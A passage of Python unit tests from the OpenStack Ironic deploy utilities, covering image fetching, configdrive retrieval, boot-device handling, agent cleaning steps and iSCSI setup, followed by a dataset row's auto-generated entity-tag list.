'path', + ctx=None, + force_raw=True) + + @mock.patch.object(image_cache, 'clean_up_caches', autospec=True) + def test_fetch_images_fail(self, mock_clean_up_caches): + + exc = exception.InsufficientDiskSpace(path='a', + required=2, + actual=1) + + mock_cache = mock.MagicMock( + spec_set=['master_dir'], master_dir='master_dir') + mock_clean_up_caches.side_effect = iter([exc]) + self.assertRaises(exception.InstanceDeployFailure, + utils.fetch_images, + None, + mock_cache, + [('uuid', 'path')]) + mock_clean_up_caches.assert_called_once_with(None, 'master_dir', + [('uuid', 'path')]) + + +@mock.patch.object(shutil, 'copyfileobj', autospec=True) +@mock.patch.object(requests, 'get', autospec=True) +class GetConfigdriveTestCase(tests_base.TestCase): + + @mock.patch.object(gzip, 'GzipFile', autospec=True) + def test_get_configdrive(self, mock_gzip, mock_requests, mock_copy): + mock_requests.return_value = mock.MagicMock( + spec_set=['content'], content='Zm9vYmFy') + utils._get_configdrive('http://127.0.0.1/cd', 'fake-node-uuid') + mock_requests.assert_called_once_with('http://127.0.0.1/cd') + mock_gzip.assert_called_once_with('configdrive', 'rb', + fileobj=mock.ANY) + mock_copy.assert_called_once_with(mock.ANY, mock.ANY) + + @mock.patch.object(gzip, 'GzipFile', autospec=True) + def test_get_configdrive_base64_string(self, mock_gzip, mock_requests, + mock_copy): + utils._get_configdrive('Zm9vYmFy', 'fake-node-uuid') + self.assertFalse(mock_requests.called) + mock_gzip.assert_called_once_with('configdrive', 'rb', + fileobj=mock.ANY) + mock_copy.assert_called_once_with(mock.ANY, mock.ANY) + + def test_get_configdrive_bad_url(self, mock_requests, mock_copy): + mock_requests.side_effect = requests.exceptions.RequestException + self.assertRaises(exception.InstanceDeployFailure, + utils._get_configdrive, 'http://127.0.0.1/cd', + 'fake-node-uuid') + self.assertFalse(mock_copy.called) + + @mock.patch.object(base64, 'b64decode', autospec=True) + def test_get_configdrive_base64_error(self, mock_b64, mock_requests, + mock_copy): + mock_b64.side_effect = TypeError + self.assertRaises(exception.InstanceDeployFailure, + utils._get_configdrive, + 'malformed', 'fake-node-uuid') + mock_b64.assert_called_once_with('malformed') + self.assertFalse(mock_copy.called) + + @mock.patch.object(gzip, 'GzipFile', autospec=True) + def test_get_configdrive_gzip_error(self, mock_gzip, mock_requests, + mock_copy): + mock_requests.return_value = mock.MagicMock( + spec_set=['content'], content='Zm9vYmFy') + mock_copy.side_effect = IOError + self.assertRaises(exception.InstanceDeployFailure, + utils._get_configdrive, 'http://127.0.0.1/cd', + 'fake-node-uuid') + mock_requests.assert_called_once_with('http://127.0.0.1/cd') + mock_gzip.assert_called_once_with('configdrive', 'rb', + fileobj=mock.ANY) + mock_copy.assert_called_once_with(mock.ANY, mock.ANY) + + +class VirtualMediaDeployUtilsTestCase(db_base.DbTestCase): + + def setUp(self): + super(VirtualMediaDeployUtilsTestCase, self).setUp() + mgr_utils.mock_the_extension_manager(driver=""iscsi_ilo"") + info_dict = db_utils.get_test_ilo_info() + self.node = obj_utils.create_test_node(self.context, + driver='iscsi_ilo', driver_info=info_dict) + + def test_get_single_nic_with_vif_port_id(self): + obj_utils.create_test_port(self.context, node_id=self.node.id, + address='aa:bb:cc', uuid=uuidutils.generate_uuid(), + extra={'vif_port_id': 'test-vif-A'}, driver='iscsi_ilo') + with task_manager.acquire(self.context, self.node.uuid, + shared=False) as task: + address = utils.get_single_nic_with_vif_port_id(task) + self.assertEqual('aa:bb:cc', address) + + +class ParseInstanceInfoCapabilitiesTestCase(tests_base.TestCase): + + def setUp(self): + super(ParseInstanceInfoCapabilitiesTestCase, self).setUp() + self.node = obj_utils.get_test_node(self.context, driver='fake') + + def test_parse_instance_info_capabilities_string(self): + self.node.instance_info = {'capabilities': '{""cat"": ""meow""}'} + expected_result = {""cat"": ""meow""} + result = utils.parse_instance_info_capabilities(self.node) + self.assertEqual(expected_result, result) + + def test_parse_instance_info_capabilities(self): + self.node.instance_info = {'capabilities': {""dog"": ""wuff""}} + expected_result = {""dog"": ""wuff""} + result = utils.parse_instance_info_capabilities(self.node) + self.assertEqual(expected_result, result) + + def test_parse_instance_info_invalid_type(self): + self.node.instance_info = {'capabilities': 'not-a-dict'} + self.assertRaises(exception.InvalidParameterValue, + utils.parse_instance_info_capabilities, self.node) + + def test_is_secure_boot_requested_true(self): + self.node.instance_info = {'capabilities': {""secure_boot"": ""tRue""}} + self.assertTrue(utils.is_secure_boot_requested(self.node)) + + def test_is_secure_boot_requested_false(self): + self.node.instance_info = {'capabilities': {""secure_boot"": ""false""}} + self.assertFalse(utils.is_secure_boot_requested(self.node)) + + def test_is_secure_boot_requested_invalid(self): + self.node.instance_info = {'capabilities': {""secure_boot"": ""invalid""}} + self.assertFalse(utils.is_secure_boot_requested(self.node)) + + def test_get_boot_mode_for_deploy_using_capabilities(self): + properties = {'capabilities': 'boot_mode:uefi,cap2:value2'} + self.node.properties = properties + + result = utils.get_boot_mode_for_deploy(self.node) + self.assertEqual('uefi', result) + + def test_get_boot_mode_for_deploy_using_instance_info_cap(self): + instance_info = {'capabilities': {'secure_boot': 'True'}} + self.node.instance_info = instance_info + + result = utils.get_boot_mode_for_deploy(self.node) + self.assertEqual('uefi', result) + + def test_get_boot_mode_for_deploy_using_instance_info(self): + instance_info = {'deploy_boot_mode': 'bios'} + self.node.instance_info = instance_info + + result = utils.get_boot_mode_for_deploy(self.node) + self.assertEqual('bios', result) + + +class TrySetBootDeviceTestCase(db_base.DbTestCase): + + def setUp(self): + super(TrySetBootDeviceTestCase, self).setUp() + mgr_utils.mock_the_extension_manager(driver=""fake"") + self.node = obj_utils.create_test_node(self.context, driver=""fake"") + + @mock.patch.object(manager_utils, 'node_set_boot_device', autospec=True) + def test_try_set_boot_device_okay(self, node_set_boot_device_mock): + with task_manager.acquire(self.context, self.node.uuid, + shared=False) as task: + utils.try_set_boot_device(task, boot_devices.DISK, + persistent=True) + node_set_boot_device_mock.assert_called_once_with( + task, boot_devices.DISK, persistent=True) + + @mock.patch.object(utils, 'LOG', autospec=True) + @mock.patch.object(manager_utils, 'node_set_boot_device', autospec=True) + def test_try_set_boot_device_ipmifailure_uefi(self, + node_set_boot_device_mock, log_mock): + self.node.properties = {'capabilities': 'boot_mode:uefi'} + self.node.save() + node_set_boot_device_mock.side_effect = exception.IPMIFailure(cmd='a') + with task_manager.acquire(self.context, self.node.uuid, + shared=False) as task: + utils.try_set_boot_device(task, boot_devices.DISK, + persistent=True) + node_set_boot_device_mock.assert_called_once_with( + task, boot_devices.DISK, persistent=True) + log_mock.warning.assert_called_once_with(mock.ANY) + + @mock.patch.object(manager_utils, 'node_set_boot_device', autospec=True) + def test_try_set_boot_device_ipmifailure_bios( + self, node_set_boot_device_mock): + node_set_boot_device_mock.side_effect = exception.IPMIFailure(cmd='a') + with task_manager.acquire(self.context, self.node.uuid, + shared=False) as task: + self.assertRaises(exception.IPMIFailure, + utils.try_set_boot_device, + task, boot_devices.DISK, persistent=True) + node_set_boot_device_mock.assert_called_once_with( + task, boot_devices.DISK, persistent=True) + + @mock.patch.object(manager_utils, 'node_set_boot_device', autospec=True) + def test_try_set_boot_device_some_other_exception( + self, node_set_boot_device_mock): + exc = exception.IloOperationError(operation=""qwe"", error=""error"") + node_set_boot_device_mock.side_effect = exc + with task_manager.acquire(self.context, self.node.uuid, + shared=False) as task: + self.assertRaises(exception.IloOperationError, + utils.try_set_boot_device, + task, boot_devices.DISK, persistent=True) + node_set_boot_device_mock.assert_called_once_with( + task, boot_devices.DISK, persistent=True) + + +class AgentCleaningTestCase(db_base.DbTestCase): + def setUp(self): + super(AgentCleaningTestCase, self).setUp() + mgr_utils.mock_the_extension_manager(driver='fake_agent') + n = {'driver': 'fake_agent', + 'driver_internal_info': {'agent_url': 'http://127.0.0.1:9999'}} + + self.node = obj_utils.create_test_node(self.context, **n) + self.ports = [obj_utils.create_test_port(self.context, + node_id=self.node.id)] + + self.clean_steps = { + 'hardware_manager_version': '1', + 'clean_steps': { + 'GenericHardwareManager': [ + {'interface': 'deploy', + 'step': 'erase_devices', + 'priority': 20}, + ], + 'SpecificHardwareManager': [ + {'interface': 'deploy', + 'step': 'update_firmware', + 'priority': 30}, + {'interface': 'raid', + 'step': 'create_raid', + 'priority': 10}, + ] + } + } + + @mock.patch('ironic.objects.Port.list_by_node_id', + spec_set=types.FunctionType) + @mock.patch.object(agent_client.AgentClient, 'get_clean_steps', + autospec=True) + def test_get_clean_steps(self, client_mock, list_ports_mock): + client_mock.return_value = { + 'command_result': self.clean_steps} + list_ports_mock.return_value = self.ports + + with task_manager.acquire( + self.context, self.node['uuid'], shared=False) as task: + response = utils.agent_get_clean_steps(task) + client_mock.assert_called_once_with(mock.ANY, task.node, + self.ports) + self.assertEqual('1', task.node.driver_internal_info[ + 'hardware_manager_version']) + + # Since steps are returned in dicts, they have non-deterministic + # ordering + self.assertEqual(2, len(response)) + self.assertIn(self.clean_steps['clean_steps'][ + 'GenericHardwareManager'][0], response) + self.assertIn(self.clean_steps['clean_steps'][ + 'SpecificHardwareManager'][0], response) + + @mock.patch('ironic.objects.Port.list_by_node_id', + spec_set=types.FunctionType) + @mock.patch.object(agent_client.AgentClient, 'get_clean_steps', + autospec=True) + def test_get_clean_steps_missing_steps(self, client_mock, + list_ports_mock): + del self.clean_steps['clean_steps'] + client_mock.return_value = { + 'command_result': self.clean_steps} + list_ports_mock.return_value = self.ports + + with task_manager.acquire( + self.context, self.node['uuid'], shared=False) as task: + self.assertRaises(exception.NodeCleaningFailure, + utils.agent_get_clean_steps, + task) + client_mock.assert_called_once_with(mock.ANY, task.node, + self.ports) + + @mock.patch('ironic.objects.Port.list_by_node_id', + spec_set=types.FunctionType) + @mock.patch.object(agent_client.AgentClient, 'execute_clean_step', + autospec=True) + def test_execute_clean_step(self, client_mock, list_ports_mock): + client_mock.return_value = { + 'command_status': 'SUCCEEDED'} + list_ports_mock.return_value = self.ports + + with task_manager.acquire( + self.context, self.node['uuid'], shared=False) as task: + response = utils.agent_execute_clean_step( + task, + self.clean_steps['clean_steps']['GenericHardwareManager'][0]) + self.assertEqual(states.CLEANING, response) + + @mock.patch('ironic.objects.Port.list_by_node_id', + spec_set=types.FunctionType) + @mock.patch.object(agent_client.AgentClient, 'execute_clean_step', + autospec=True) + def test_execute_clean_step_running(self, client_mock, list_ports_mock): + client_mock.return_value = { + 'command_status': 'RUNNING'} + list_ports_mock.return_value = self.ports + + with task_manager.acquire( + self.context, self.node['uuid'], shared=False) as task: + response = utils.agent_execute_clean_step( + task, + self.clean_steps['clean_steps']['GenericHardwareManager'][0]) + self.assertEqual(states.CLEANING, response) + + @mock.patch('ironic.objects.Port.list_by_node_id', + spec_set=types.FunctionType) + @mock.patch.object(agent_client.AgentClient, 'execute_clean_step', + autospec=True) + def test_execute_clean_step_version_mismatch(self, client_mock, + list_ports_mock): + client_mock.return_value = { + 'command_status': 'RUNNING'} + list_ports_mock.return_value = self.ports + + with task_manager.acquire( + self.context, self.node['uuid'], shared=False) as task: + response = utils.agent_execute_clean_step( + task, + self.clean_steps['clean_steps']['GenericHardwareManager'][0]) + self.assertEqual(states.CLEANING, response) + + +@mock.patch.object(utils, 'is_block_device', autospec=True) +@mock.patch.object(utils, 'login_iscsi', lambda *_: None) +@mock.patch.object(utils, 'discovery', lambda *_: None) +@mock.patch.object(utils, 'logout_iscsi', lambda *_: None) +@mock.patch.object(utils, 'delete_iscsi', lambda *_: None) +@mock.patch.object(utils, 'get_dev', lambda *_: '/dev/fake') +class ISCSISetupAndHandleErrorsTestCase(tests_base.TestCase): + + def test_no_parent_device(self, mock_ibd): + address = '127.0.0.1' + port = 3306 + iqn = 'iqn.xyz' + lun = 1 + mock_ibd.return_value = False + expected_dev = '/dev/fake' + with testtools.ExpectedException(exception.InstanceDeployFailure): + with utils._iscsi_setup_and_handle_errors( + address, port, iqn, lun) as dev: + self.assertEqual(expected_dev, dev) + + mock_ibd.assert_called_once_with(expected_dev) + + def test_parent_device_yield(self, mock_ibd): + address = '127.0.0.1' + port = 3306 + iqn = 'iqn.xyz' + lun = 1 + expected_dev = '/dev/fake' + mock_ibd.return_value = True + with utils._iscsi_setup_and_handle_errors(address, port, + iqn, lun) as dev: + self.assertEqual(expected_dev, dev) + + mock_ibd.assert_called_once_with(expected_dev) +",75381,"[['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['DATE_TIME', '2012'], ['DATE_TIME', '2011'], ['DATE_TIME', '2011'], ['PERSON', 'Ilya Alekseyev'], ['LOCATION', 'TestCase'], ['PERSON', 'MagicMock(spec='], ['NRP', 'zip(mock_list'], ['PERSON', 'root_part'], ['PERSON', 'root_uuid'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'root_part'], ['PERSON', 'root_uuid'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['LOCATION', 'root_mb'], ['PERSON', 'root_part'], ['PERSON', 'root_uuid'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['LOCATION', 'root_mb'], ['PERSON', 'root_part'], ['PERSON', 'root_uuid'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['LOCATION', 'root_mb'], ['PERSON', 'mock.call.mkfs(dev=ephemeral_part'], ['PERSON', 'root_part'], ['PERSON', 'root_uuid'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['LOCATION', 'root_mb'], ['PERSON', 'unlink_without_raise'], ['PERSON', 'autospec=True'], ['PERSON', 'root_part'], ['PERSON', 'root_uuid'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['URL', 'mock.ca'], ['URL', 'mock.call.ma'], ['LOCATION', 'root_mb'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'self.as'], ['URL', 'unlink.as'], ['URL', 'mock.pa'], ['PERSON', 'autospec=True'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['NRP', 'lun'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'mock_os.assert_called_once_with(check_dir'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'mock_update'], ['PERSON', 'MagicMock(spec='], ['NRP', 'zip(mock_list'], ['LOCATION', 'mock.call.work_on_disk(dev'], ['LOCATION', 'root_mb'], ['LOCATION', 'TestCase'], ['PERSON', 'fname'], ['URL', 'self.ad'], ['LOCATION', 'super(OtherFunctionTestCase'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['DATE_TIME', 'test_parse_root_device_hints(self'], ['LOCATION', 'utils.parse_root_device_hints'], ['LOCATION', 'utils.parse_root_device_hints'], ['LOCATION', 'TestCase'], ['LOCATION', 'super(WorkOnDiskTestCase'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'self.root_mb'], ['LOCATION', 'self.root_mb'], ['LOCATION', 'self.root_mb'], ['LOCATION', 'self.root_mb'], ['PERSON', 'root_part'], ['LOCATION', 'self.root_mb'], ['LOCATION', 'self.root_mb'], ['PERSON', 'unlink_without_raise'], ['PERSON', 'autospec=True'], ['URL', 'mock.pa'], ['PERSON', 'autospec=True'], ['URL', 'configdrive.re'], ['PERSON', 'root_part'], ['LOCATION', 'self.root_mb'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'ibd.ca'], ['LOCATION', 'self.root_mb'], ['URL', 'unlink.as'], ['URL', 'mock.pa'], ['PERSON', 'autospec=True'], ['LOCATION', 'TestCase'], ['LOCATION', 'super(MakePartitionsTestCase'], ['LOCATION', 'self.root_mb'], ['PERSON', 'run_as_root=True'], ['LOCATION', 'self.root_mb'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'TestCase'], ['LOCATION', 'super(DestroyMetaDataTestCase'], ['LOCATION', 'mock_exec'], ['PERSON', 'run_as_root=True'], ['LOCATION', 'mock_exec'], ['PERSON', 'run_as_root=True'], ['LOCATION', 'mock_exec'], ['PERSON', 'run_as_root=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'TestCase'], ['LOCATION', 'super(GetDeviceBlockSizeTestCase'], ['PERSON', 'autospec=True'], ['PERSON', 'qemu_img_info'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'TestCase'], ['LOCATION', 'mock_qinfo'], ['LOCATION', 'mock_qinfo'], ['LOCATION', 'RealFilePartitioningTestCase(tests_base'], ['LOCATION', 'TestCase'], ['LOCATION', 'super(RealFilePartitioningTestCase'], ['PERSON', 'self.file.close'], ['DATE_TIME', 'zip(part_table'], ['PERSON', 'Fedora'], ['DATE_TIME', 'Fedora 20'], ['LOCATION', 'self.assertEqual([6'], ['PERSON', 'autospec=True'], ['PERSON', 'utils.fetch_images(None'], ['PERSON', 'autospec=True'], ['LOCATION', 'utils.fetch_images'], ['PERSON', 'mock_cache'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'TestCase'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['URL', 'requests.si'], ['LOCATION', 'b64decode'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'VirtualMediaDeployUtilsTestCase(db_base'], ['LOCATION', 'TestCase'], ['PERSON', 'autospec=True'], ['PERSON', 'boot_devices'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', ""IPMIFailure(cmd='a""], ['PERSON', 'boot_devices'], ['PERSON', 'autospec=True'], ['PERSON', ""IPMIFailure(cmd='a""], ['PERSON', 'boot_devices'], ['PERSON', 'boot_devices'], ['PERSON', 'autospec=True'], ['NRP', 'node_set_boot_device_mock.side_effect'], ['PERSON', 'boot_devices'], ['PERSON', 'boot_devices'], ['URL', 'self.no'], ['URL', 'utils.cr'], ['URL', 'self.co'], ['PERSON', ""self.assertEqual('1""], ['LOCATION', 'test_get_clean_steps_missing_steps(self'], ['PERSON', 'autospec=True'], ['LOCATION', 'ISCSISetupAndHandleErrorsTestCase(tests_base'], ['LOCATION', 'TestCase'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'ironic.com'], ['URL', 'ironic.com'], ['URL', 'ironic.com'], ['URL', 'ironic.com'], ['URL', 'ironic.com'], ['URL', 'ironic.com'], ['URL', 'ironic.co'], ['URL', 'ironic.co'], ['URL', 'ironic.drivers.mo'], ['URL', 'ironic.drivers.mo'], ['URL', 'ironic.drivers.mo'], ['URL', 'ironic.tests.co'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'patcher.st'], ['URL', 'self.ad'], ['URL', 'patcher.st'], ['URL', 'mock.Ma'], ['URL', 'mock.at'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'uuid.re'], ['URL', 'mock.ma'], ['URL', 'partitions.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.call.de'], ['URL', 'mock.call.ma'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.ca'], ['URL', 'mock.call.mk'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.de'], ['URL', 'mock.as'], ['URL', 'mock.pa'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'mock.si'], ['URL', 'mock.ma'], ['URL', 'partitions.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.call.de'], ['URL', 'mock.call.ma'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.call.mk'], ['URL', 'mock.ca'], ['URL', 'mock.call.mk'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'mock.as'], ['URL', 'mock.as'], ['URL', 'self.as'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'uuid.re'], ['URL', 'mock.ma'], ['URL', 'partitions.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.call.de'], ['URL', 'mock.call.ma'], ['URL', 'mock.call.is'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'self.as'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'uuid.re'], ['URL', 'mock.ma'], ['URL', 'partitions.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.call.de'], ['URL', 'mock.call.ma'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.ca'], ['URL', 'mock.call.mk'], ['URL', 'mock.call.mk'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'self.as'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'uuid.re'], ['URL', 'mock.ma'], ['URL', 'partitions.re'], ['URL', 'uuid.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.call.ma'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.ca'], ['URL', 'mock.call.mk'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'self.as'], ['URL', 'mock.ge'], ['URL', 'size.ca'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'uuid.re'], ['URL', 'mock.ma'], ['URL', 'partitions.re'], ['URL', 'configdrive.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.call.de'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.ca'], ['URL', 'mock.AN'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'gdi.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'exec.re'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.ve'], ['URL', 'self.as'], ['URL', 'exec.ca'], ['URL', 'mock.pa'], ['URL', 'os.pa'], ['URL', 'os.re'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.ch'], ['URL', 'self.as'], ['URL', 'os.ca'], ['URL', 'mock.pa'], ['URL', 'os.pa'], ['URL', 'os.re'], ['URL', 'utils.ch'], ['URL', 'os.as'], ['URL', 'mock.pa'], ['URL', 'exec.re'], ['URL', 'utils.ve'], ['URL', 'exec.as'], ['URL', 'mock.pa'], ['URL', 'utils.fo'], ['URL', 'exec.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'exec.re'], ['URL', 'exec.as'], ['URL', 'verify.as'], ['URL', 'update.as'], ['URL', 'dev.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'patcher.st'], ['URL', 'self.ad'], ['URL', 'patcher.st'], ['URL', 'mock.Ma'], ['URL', 'mock.at'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'disk.si'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'self.as'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'tempfile.mk'], ['URL', 'os.cl'], ['URL', 'f.re'], ['URL', 'self.as'], ['URL', 'f.re'], ['URL', 'self.as'], ['URL', 'cfg.CONF.se'], ['URL', 'f.re'], ['URL', 'self.as'], ['URL', 'cfg.CONF.se'], ['URL', 'f.re'], ['URL', 'self.as'], ['URL', 'f.re'], ['URL', 'self.as'], ['URL', 'f.re'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'time.sl'], ['URL', 'utils.mo'], ['URL', 'self.no'], ['URL', 'utils.cr'], ['URL', 'self.co'], ['URL', 'utils.ge'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'blk.re'], ['URL', 'self.as'], ['URL', 'utils.is'], ['URL', 'blk.as'], ['URL', 'mock.pa'], ['URL', 'os.si'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.is'], ['URL', 'os.as'], ['URL', 'mock.ca'], ['URL', 'mock.pa'], ['URL', 'os.pa'], ['URL', 'mock.pa'], ['URL', 'getsize.re'], ['URL', 'csize.re'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'getsize.re'], ['URL', 'csize.re'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'getsize.re'], ['URL', 'csize.re'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'getsize.re'], ['URL', 'csize.re'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'self.node.pro'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.pro'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.pro'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.pro'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.node.pro'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'mock.pa'], ['URL', 'self.im'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.mo'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'obj.st'], ['URL', 'self.ad'], ['URL', 'self.mo'], ['URL', 'obj.st'], ['URL', 'self.mo'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'obj.st'], ['URL', 'self.ad'], 